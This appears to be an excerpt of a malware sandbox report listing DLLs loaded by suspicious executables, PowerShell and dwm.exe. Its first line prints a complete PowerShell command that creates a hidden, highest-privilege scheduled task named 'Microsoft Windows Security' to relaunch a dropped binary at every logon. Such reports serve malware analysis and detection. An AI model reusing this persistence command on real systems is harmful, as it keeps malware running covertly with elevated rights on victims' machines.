                  Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                  Source: C:\Users\user\Desktop\newtpp.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\newtpp.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\newtpp.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\newtpp.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\newtpp.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\newtpp.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\newtpp.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: napinsp.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: pnrpnsp.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: wshbth.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: nlaapi.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: winrnr.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\sysnldcvmr.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\1224321169.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2736615137.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\204078699.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\191563587.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: napinsp.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wshbth.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: winrnr.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
